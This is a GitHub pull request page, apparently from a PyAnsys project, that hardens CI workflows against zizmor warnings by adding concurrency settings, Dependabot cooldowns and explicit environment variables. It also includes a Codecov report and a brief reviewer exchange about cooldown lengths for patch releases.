Zizmor - Fix CI warnings with template injection and concurrency

[da1910]

Fix zizmor warnings from 2025/12/30T00:16:29Z

Workflow concurrency improvements:

• Added the concurrency configuration to .github/workflows/ci_cd.yml, .github/workflows/dependabot_approve.yml, and .github/workflows/security_checks.yml to ensure that only one workflow run per pull request or ref is active at a time, canceling any in-progress runs for the same group. [1] [2] [3]

Dependabot configuration enhancements:

• Introduced a cooldown period in .github/dependabot.yml for both pip and github-actions ecosystems, setting default-days to 5 and semver-patch-days to 3, to reduce the risk of supply chain attacks. [1] [2]

Dependabot approval workflow fixes:

• Updated environment variable usage in the dependabot_approve.yml workflow to use explicit variables (REPOSITORY, EVENT_NUMBER, PR_URL) to reduce the risk of code injection attacks.

[codecov]

Codecov Report

✅ All modified and coverable lines are covered by tests.
✅ Project coverage is 94.76%. Comparing base (cf089c0) to head (e8fac28).
⚠️ Report is 2 commits behind head on main.

Additional details and impacted files

@@           Coverage Diff           @@
##             main     #939   +/-   ##
=======================================
  Coverage   94.76%   94.76%           
=======================================
  Files           7        7           
  Lines         802      802           
=======================================
  Hits          760      760           
  Misses         42       42           

☔ View full report in Codecov by Sentry.
📢 Have feedback on the report? Share it here.

🚀 New features to boost your workflow:

• ❄️ Test Analytics: Detect flaky tests, report on failures, and find test suite problems.

[ludovicsteinbach]

What is the reasoning behind having a shorter cooldown period for patches?

[da1910]

Patches tend to be smaller in scope, so easier to review diffs, and they're usually the change that's produced to fix security issues where we do want a faster throughout.

That said we can happily change it if we prefer, this was a first pass

[ludovicsteinbach]

I don't have a strong opinion, I was just curious. For other repos I think I had only defined a default cooldown of 7 days, regardless of the semver version. And I cannot really remember if there was consensus at the PyAnsys level.

I suppose a supply chain attack is more likely to be achieved via a patch than a major release (to maximize reach), so from a security perspective I would be inclined to think that patches are more vulnerable. But I suppose there isn't much difference between 3 days and 5 days cooldown in that context.